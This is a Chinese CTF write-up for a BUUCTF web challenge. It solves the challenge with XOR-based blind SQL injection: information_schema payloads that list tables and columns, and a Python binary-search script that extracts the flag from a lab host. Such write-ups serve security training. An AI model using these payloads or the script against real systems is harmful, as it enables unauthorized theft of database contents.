BUUCTF-WEB 【WUSTCTF2020】颜值成绩查询 1

考点：异或注入

打开

测试

1^1^1 正常

1^0^1 错误

构造payload

# 查表
1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())), 1,1))>0)^1

# 查列
1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')), 1,1))>0)^1

# 查数据
1^(ord(substr((select(group_concat(flag,value))from(flag)), 1,1))>0)^1

表名

[+] flag,score

列名

[+] flag,value

上脚本

import requests
import time


def payload(url, i, mid): # 猜解单个字段值
    payload = "1^(ord(substr((select(group_concat(value))from(flag)), %d,1))>=%s)^1"%(i,mid)
    payload_url = url + payload
    # time.sleep(1)
    print(payload)
    resp = requests.get(payload_url)
    # 如果能够执行下列语句 则代表着 大于或等于
    if "admin" in resp.text:
        # 再次进行判断
        payload = "1^(ord(substr((select(group_concat(value))from(flag)), %d,1))=%s)^1"%(i,mid)
        payload_url = url + payload
        time.sleep(1)
        print(payload)
        resp = requests.get(payload_url)
        if "admin" in resp.text:
        # 拿到目标数
            return 200
        else:
            # 小于目标值
            return 203
    # 大于目标值
    else:
        return 400


def exp(url):
    column_value = ""
    for i in range(1,300):
        start = 33
        end = 127
        while start <= end:
            mid = (start + end) // 2
            res = payload(url,i,mid)
            print("[*] 返回码：" + str(res))
            # 代表找到
            if res == 200:
                print("[+] mid = "+str(mid))
                column_value += chr(mid)
                break
            # 代表是小于字符ascii码值
            elif res == 203:
                start = mid + 1 
            # 代表是大于 ascii码值
            elif res == 400:
                end = mid - 1
        print("[+] " + column_value)
        

if __name__=='__main__':
    url = "http://2881a64e-02bf-4c71-b948-26b1a1e6c0ae.node3.buuoj.cn/?stunum="
    exp(url)